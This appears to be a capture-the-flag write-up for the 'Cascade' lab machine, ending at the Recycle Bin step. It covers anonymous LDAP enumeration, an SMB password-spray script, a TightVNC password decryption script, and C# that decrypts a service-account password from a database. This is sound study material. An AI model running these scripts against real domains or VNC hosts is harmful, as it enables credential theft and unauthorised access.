
Cascade was a cool 30 point box created by VbScrub. It started out with some LDAP enumeration (anonymous bind) that allowed you to find a Base64 encoded password in a custom attribute, which you then use to log into SMB. In a share you discover a TightVNC registry export containing an "encrypted" password; VNC stores its password DES-encrypted under a fixed, publicly known key, so it can be decrypted outright from an interactive Ruby shell rather than cracked, and the result gets you in via WinRM for user. After that you have to decrypt a password from an audit database using the AES key and IV hardcoded in the application's own binaries, which I reproduced in some C#. That account turns out to be a member of the AD Recycle Bin group, which lets you read the attributes of deleted objects and recover a temporary administrator password. You then log in as Administrator and get root.
User.txt
Nmap
A quick nmap scan reveals the following ports:
# nmap -sT -p- --min-rate 5000 10.10.10.182
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Focusing on the more important ports we get the following information:
# nmap -sV -sC -T4 10.10.10.182 -p 53,389,445
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-24T10:16:45
|_ start_date: 2020-07-24T04:15:36
SMB
Running nullinux, which enumerates over a SMB null session (no credentials at all), you can acquire a list of valid domain users from the host:
# nullinux -users 10.10.10.182
Starting nullinux v5.4.1 | 07-24-2020 06:12
[*] Enumerating Domain Information for: 10.10.10.182
[+] Domain Name: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Group: Domain Users
administrator
krbtgt
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
I saved these to a file as they may come in handy at a later stage. I couldn’t access/list any shares anonymously so I moved on to check out what information could be extracted from LDAP.
LDAP
The following command performs an anonymous simple bind (-x with no bind DN) and dumps every object with the Person object class, i.e. user information (logon count, sAMAccountName, etc.). The fact that this works unauthenticated is itself a finding:
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)'
# CascGuest, Users, cascade.local
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109153140.0Z
whenChanged: 20200110160637.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
uSNChanged: 45094
name: CascGuest
objectGUID:: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: CascGuest
sAMAccountType: 805306368
userPrincipalName: CascGuest@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200109175934.0Z
dSCorePropagationData: 20200109154857.0Z
dSCorePropagationData: 16010714223649.0Z
lastLogonTimestamp: 132230700642958462
# CASC-DC1, Domain Controllers, cascade.local
dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local
...
This dumps a lot of information; however, using grep we can narrow the output down significantly based on supplied keywords:
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i samaccountname
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft
I decided to grep for specific strings like password, secret, key, user, etc., but these returned nothing particularly interesting.
Two attributes always worth checking are logonCount (to identify accounts that are actually in use) and badPwdCount (to see how close an account already is to the lockout threshold before you spray anything at it). I grepped for the string pwd and was surprised to see cascadeLegacyPwd in the output:
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i pwd
badPwdCount: 0
pwdLastSet: 0
badPwdCount: 0
pwdLastSet: 132400377614404824
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
pwdLastSet: 132233548311955855
badPwdCount: 0
pwdLastSet: 132230756844150124
badPwdCount: 0
pwdLastSet: 132233522678003963
badPwdCount: 0
pwdLastSet: 132233532260320793
badPwdCount: 0
pwdLastSet: 132233533933579732
badPwdCount: 0
pwdLastSet: 132233607021669462
badPwdCount: 0
pwdLastSet: 132234069391538655
badPwdCount: 0
pwdLastSet: 132234069729591249
badPwdCount: 0
pwdLastSet: 132234070231912131
badPwdCount: 0
pwdLastSet: 132234098399165604
badPwdCount: 0
pwdLastSet: 132235983818652005
cascadeLegacyPwd is not a standard Active Directory attribute; it is a custom schema extension, and nothing stops an anonymous reader from seeing it. The value is only Base64 encoded (encoding, not encryption) and decodes to rY4n5eva:
# echo clk0bjVldmE= | base64 -d; echo
rY4n5eva
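Grepping for pwd only worked because the custom attribute happened to have an obvious name. A more general check is to parse the LDIF, compare each entry's attribute names against the set a stock user object carries, and try to decode anything unexpected. The script below is an added example, not part of the original writeup; it embeds a constructed LDIF sample built from the values shown above, and its baseline attribute list is an assumption drawn from the CascGuest entry rather than the full AD schema.

```ruby
# Parse ldapsearch LDIF output and flag attributes that are not part of a
# standard user object, decoding any value that looks like printable Base64.

# Attribute names seen on a stock AD user (taken from the CascGuest entry
# above plus a few common ones). Assumption: a working baseline, not the
# complete AD schema; extend it for your own environment.
BASELINE_ATTRS = %w[
  dn objectClass cn sn givenName displayName description distinguishedName
  instanceType whenCreated whenChanged uSNCreated uSNChanged memberOf name
  objectGUID userAccountControl badPwdCount codePage countryCode
  badPasswordTime lastLogoff lastLogon pwdLastSet primaryGroupID objectSid
  accountExpires logonCount sAMAccountName sAMAccountType userPrincipalName
  objectCategory isCriticalSystemObject dSCorePropagationData lastLogonTimestamp
].map(&:downcase).freeze

# Constructed sample: a trimmed CascGuest entry, an r.thompson entry carrying
# the custom attribute found above, and a clean s.smith entry. The CN/OU
# layout for the two users is assumed, not copied from the box.
SAMPLE_LDIF = <<~LDIF
  # CascGuest, Users, cascade.local
  dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
  objectClass: user
  cn: CascGuest
  objectGUID:: LrFX+qgBukGjmV+ZFABrZw==
  sAMAccountName: CascGuest

  # r.thompson, Users, UK, cascade.local
  dn: CN=r.thompson,OU=Users,OU=UK,DC=cascade,DC=local
  objectClass: user
  cn: r.thompson
  sAMAccountName: r.thompson
  cascadeLegacyPwd: clk0bjVldmE=

  # s.smith, Users, UK, cascade.local
  dn: CN=s.smith,OU=Users,OU=UK,DC=cascade,DC=local
  objectClass: user
  sAMAccountName: s.smith
LDIF

# Turn LDIF text into an array of entries, each { "attr" => [values] }.
# "attr:: value" is LDIF's own Base64 wrapping for binary data; those values
# are decoded to raw bytes (ASCII-8BIT) so they are not "decoded" again.
def parse_ldif(text)
  entries = []
  current = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.start_with?('#')
    if line.strip.empty?
      entries << current if current
      current = nil
      next
    end
    attr, sep, value = line.partition(/::? /)
    next if sep.empty?                      # not an attribute line
    current ||= Hash.new { |h, k| h[k] = [] }
    current[attr] << (sep == ':: ' ? value.unpack1('m0') : value)
  end
  entries << current if current
  entries
end

# Case-insensitive attribute lookup (LDAP attribute names are not case-sensitive).
def attribute(entry, name)
  entry.find { |k, _| k.casecmp?(name) }&.last
end

# Strict Base64 that decodes to printable text is returned; anything else is nil.
def decode_printable_base64(value)
  return nil unless value.match?(%r{\A[A-Za-z0-9+/]+={0,2}\z}) && (value.length % 4).zero?
  decoded = value.unpack1('m0').force_encoding('UTF-8')
  decoded.valid_encoding? && decoded.match?(/\A[[:print:]]+\z/) ? decoded : nil
rescue ArgumentError
  nil
end

# Report every non-baseline attribute on every entry, with a decoded value
# where the raw value was printable Base64.
def find_suspect_attributes(ldif_text)
  findings = []
  parse_ldif(ldif_text).each do |entry|
    account = attribute(entry, 'sAMAccountName')&.first
    entry.each do |attr, values|
      next if BASELINE_ATTRS.include?(attr.downcase)
      values.each do |raw|
        next if raw.encoding == Encoding::ASCII_8BIT   # LDIF-wrapped binary, skip
        findings << { account: account, attribute: attr, raw: raw,
                      decoded: decode_printable_base64(raw) }
      end
    end
  end
  findings
end

find_suspect_attributes(SAMPLE_LDIF).each do |f|
  hint = f[:decoded] ? "  (base64 -> #{f[:decoded]})" : ''
  puts "#{f[:account]}: #{f[:attribute]} = #{f[:raw]}#{hint}"
end
```

Feed it the real dump with `ruby scan.rb < ldap.ldif` after swapping SAMPLE_LDIF for `$stdin.read`. The same approach catches attributes whose names carry no hint at all (info, comment, or a vendor-prefixed extension), which a keyword grep would miss.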
My crackmapexec install was not working at the time, so I wrote a quick bash script to find which user the password belonged to. Each account gets exactly one attempt, which keeps us well clear of any lockout policy:
#!/bin/bash
# Try the recovered password once against every user enumerated earlier.
# /root/users is the list saved from the nullinux output, one name per line.
while read -r user; do
    echo "User: $user"
    smbmap -H 10.10.10.182 -u "$user" -p rY4n5eva
done < /root/users
Running the script shows that r.thompson is the correct user:
# ./smb.sh
User: arksvc
[!] Authentication error on 10.10.10.182
User: s.smith
[!] Authentication error on 10.10.10.182
User: r.thompson
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
User: util
[!] Authentication error on 10.10.10.182
User: j.wakefield
[!] Authentication error on 10.10.10.182
User: s.hickson
[!] Authentication error on 10.10.10.182
User: j.goodhand
[!] Authentication error on 10.10.10.182
User: a.turnbull
[!] Authentication error on 10.10.10.182
User: e.crowe
[!] Authentication error on 10.10.10.182
User: b.hanson
[!] Authentication error on 10.10.10.182
User: d.burman
[!] Authentication error on 10.10.10.182
User: BackupSvc
[!] Authentication error on 10.10.10.182
User: j.allen
[!] Authentication error on 10.10.10.182
User: i.croft
[!] Authentication error on 10.10.10.182
SMB
The Data share caught my eye. Listing it recursively, the references to the AD Recycle Bin were interesting, as was a VNC Install.reg file sitting in s.smith's temp directory:
# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R 'Data'
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
Data READ ONLY
.\Data\*
dr--r--r-- 0 Tue Jan 28 17:05:51 2020 .
dr--r--r-- 0 Tue Jan 28 17:05:51 2020 ..
dr--r--r-- 0 Sun Jan 12 20:45:14 2020 Contractors
dr--r--r-- 0 Sun Jan 12 20:45:10 2020 Finance
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 IT
dr--r--r-- 0 Sun Jan 12 20:45:20 2020 Production
dr--r--r-- 0 Sun Jan 12 20:45:16 2020 Temps
.\Data\IT\*
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 .
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 ..
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 Email Archives
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 LogonAudit
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 Logs
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 Temp
.\Data\IT\Email Archives\*
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 .
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 ..
fr--r--r-- 2522 Tue Jan 28 13:00:30 2020 Meeting_Notes_June_2018.html
.\Data\IT\Logs\*
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 ..
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 DCs
.\Data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 ..
fr--r--r-- 1303 Tue Jan 28 20:19:11 2020 ArkAdRecycleBin.log
.\Data\IT\Logs\DCs\*
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 .
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 ..
fr--r--r-- 5967 Sun Jan 26 17:22:05 2020 dcdiag.log
.\Data\IT\Temp\*
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 .
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 ..
dr--r--r-- 0 Tue Jan 28 17:06:55 2020 r.thompson
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 s.smith
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 15:00:01 2020 VNC Install.reg
I then logged in with smbclient and recursively downloaded every file the account could read from the share:
# smbclient \\\\10.10.10.182\\Data -U=r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
13106687 blocks of size 4096. 7797638 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (7.6 KiloBytes/sec) (average 7.6 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (4.0 KiloBytes/sec) (average 5.8 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (18.1 KiloBytes/sec) (average 9.9 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>
The directory tree is now saved locally on Kali:
# ls
Contractors Finance IT Production Temps
find shows which files were actually downloaded (the other top-level directories exist but r.thompson cannot list them):
# find . -type f
./IT/Temp/s.smith/VNC Install.reg
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs/dcdiag.log
./IT/Email Archives/Meeting_Notes_June_2018.html
The ArkAdRecycleBin.log file contained some interesting information:
# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
This is of no particular use to us yet, but two details are worth noting for later: the tool runs as CASCADE\ArkSvc, and an account called TempAdmin was moved to the AD recycle bin. The VNC Install.reg file, however, contained an interesting string straight away: "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
# cat IT/Temp/s.smith/VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
VNC Password Decryption
Googling the registry value led me to a page on GitHub explaining that TightVNC (like RealVNC and UltraVNC) stores the server password DES-encrypted under a hardcoded key, so it can be decrypted directly rather than cracked. Metasploit's Rex library ships an RFB implementation with that cipher, so from the interactive Ruby shell inside msfconsole you can recover the password in three easy steps:
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey
=> "sT333ve2"
The password is sT333ve2. As the file was in the s.smith directory of the share, we can presume that this is the password for that account.
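The same decryption without Metasploit, using only Ruby's standard OpenSSL binding. This is an added example and not code from the original writeup or from the VNC projects; the key bytes are the ones passed to Rex above. Two practical details it handles: VNC's bundled DES reads key bytes in the opposite bit order to OpenSSL, so the fixed key must be bit-reversed per byte (which is where the widely quoted hex key e84ad660c4721ae0 comes from), and single DES has moved to OpenSSL 3's legacy provider, so the block runs it as 3DES with three identical subkeys, which is mathematically the same as single DES.

```ruby
require 'openssl'

# The DES key hardcoded in every VNC server lineage (RealVNC, TightVNC,
# UltraVNC) for obfuscating the stored password; the same bytes Rex uses.
VNC_FIXED_KEY = [0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07].pack('C*').freeze

# VNC's d3des consumes each key byte LSB-first, OpenSSL's DES MSB-first, so
# every key byte has to be bit-reversed before OpenSSL will agree with VNC.
def reverse_bits(byte)
  byte.to_s(2).rjust(8, '0').reverse.to_i(2)
end

def openssl_vnc_key
  VNC_FIXED_KEY.bytes.map { |b| reverse_bits(b) }.pack('C*')
end

# Accepts the raw .reg line ("Password"=hex:6b,cf,...), the hex: payload,
# or a bare hex string, and returns the ciphertext bytes.
def reg_hex_to_bytes(reg_value)
  [reg_value.sub(/\A.*hex:/, '').delete(', ')].pack('H*')
end

# Decrypt the 8-byte DES-ECB blob. Run as 3DES with K1 = K2 = K3 (identical
# to single DES) because single DES lives in OpenSSL 3's legacy provider
# and may not be loadable on a stock install.
def decrypt_vnc_password(reg_value)
  blob = reg_hex_to_bytes(reg_value)
  raise ArgumentError, "expected an 8-byte blob, got #{blob.bytesize}" unless blob.bytesize == 8

  cipher = OpenSSL::Cipher.new('des-ede3')
  cipher.decrypt
  cipher.key = openssl_vnc_key * 3
  cipher.padding = 0                       # VNC NUL-pads to 8 bytes; no PKCS#7
  plain = cipher.update(blob) + cipher.final
  plain.delete("\0").force_encoding('UTF-8')
end

puts decrypt_vnc_password('"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f')
```

Because the key is fixed and the block is a single DES block, this is obfuscation rather than encryption: anyone who can read the registry value, a .reg export, or a backup of it has the password. Treat any VNC "Password" value found on a share as plaintext for triage purposes.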
Flag
This holds true: you can simply log in with evil-winrm and type the user flag:
# evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> type desktop/user.txt
aad2e8...
Root.txt
SMB
There wasn't much to find on the host logged in as s.smith, so I checked which shares the account had access to instead:
# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
The Audit$ share, which r.thompson could not read, stands out immediately. Recursively listing its contents displays some interesting looking files: a .NET executable, a crypto DLL, a SQLite database and the SQLite runtime:
# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R 'Audit$'
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 .
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 ..
fr--r--r-- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 DB
fr--r--r-- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x64
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 .
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 ..
fr--r--r-- 24576 Tue Jan 28 16:43:18 2020 Audit.db
.\Audit$\x64\*
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 ..
fr--r--r-- 1639936 Tue Jan 28 15:42:18 2020 SQLite.Interop.dll
.\Audit$\x86\*
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 ..
fr--r--r-- 1246720 Tue Jan 28 15:42:18 2020 SQLite.Interop.dll
I then downloaded all of them using smbclient:
# smbclient \\\\10.10.10.182\\Audit$ -U=s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe A 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll A 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
13106687 blocks of size 4096. 7796288 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (32.6 KiloBytes/sec) (average 32.6 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (37.2 KiloBytes/sec) (average 34.6 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as Audit.db (75.7 KiloBytes/sec) (average 47.2 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.1 KiloBytes/sec) (average 36.3 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (704.4 KiloBytes/sec) (average 217.9 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (177.7 KiloBytes/sec) (average 203.6 KiloBytes/sec)
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (1324.6 KiloBytes/sec) (average 535.0 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as SQLite.Interop.dll (805.2 KiloBytes/sec) (average 607.9 KiloBytes/sec)
smb: \>
File Analysis
The Audit.db file caught my eye first, so I opened it in sqliteonline.com to see whether it contained anything useful. Running SELECT * FROM ldap; in the console displays the username ArkSvc alongside what appears to be a Base64 encoded password:

Base64 decoding the value only produced binary junk, so it is not a simple encoding like cascadeLegacyPwd was. Given the CascCrypto.dll sitting in the same share, I presumed the password was encrypted and the ciphertext then Base64 encoded for storage.
dnSpy
Loading the DLL into dnSpy let me look for a decrypt function that could be used to recover the plaintext password for the ArkSvc account.

As you can see, the decrypt function takes the encrypted string and a key; the IV is a constant inside the DLL. I couldn't find the key in the DLL itself, so I loaded CascAudit.exe into dnSpy to look for the caller. After a quick look around I found the key hardcoded in the following location:

Decrypt Function
I copied the decrypt function from the DLL into the dotnetfiddle.net online C# compiler, with a couple of small additions so the code would compile and write the decrypted string to the console:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Crypto
{
    public static void Main()
    {
        // Ciphertext from the ldap table in Audit.db, key from CascAudit.exe
        Console.WriteLine(DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
    }

    // Lifted from CascCrypto.dll: AES-128-CBC with a constant IV and a key that
    // the caller (CascAudit.exe) hardcodes too. Anything compiled into a binary
    // that users can read is recoverable by those users.
    public static string DecryptString(string EncryptedString, string Key)
    {
        byte[] array = Convert.FromBase64String(EncryptedString);
        Aes aes = Aes.Create();
        aes.KeySize = 128;
        aes.BlockSize = 128;
        aes.IV = Encoding.UTF8.GetBytes(DefaultIV);
        aes.Mode = CipherMode.CBC;
        aes.Key = Encoding.UTF8.GetBytes(Key);
        string @string;
        using (MemoryStream memoryStream = new MemoryStream(array))
        {
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
            {
                // The decompiled code sized the buffer to the ciphertext length and
                // converted all of it, so the PKCS#7 padding stripped by the decryptor
                // came back as trailing NULs. Using the byte count Read returns avoids that.
                byte[] array2 = new byte[array.Length];
                int read = cryptoStream.Read(array2, 0, array2.Length);
                @string = Encoding.UTF8.GetString(array2, 0, read);
            }
        }
        return @string;
    }

    public const string DefaultIV = "1tdyjCbY1Ix49842";
    public const int Keysize = 128;
}
Running the code displays the following decrypted password: w3lc0meFr31nd

You can then evil-winrm into the host with the ArkSvc / w3lc0meFr31nd credentials:
# evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
AD Recycle Bin
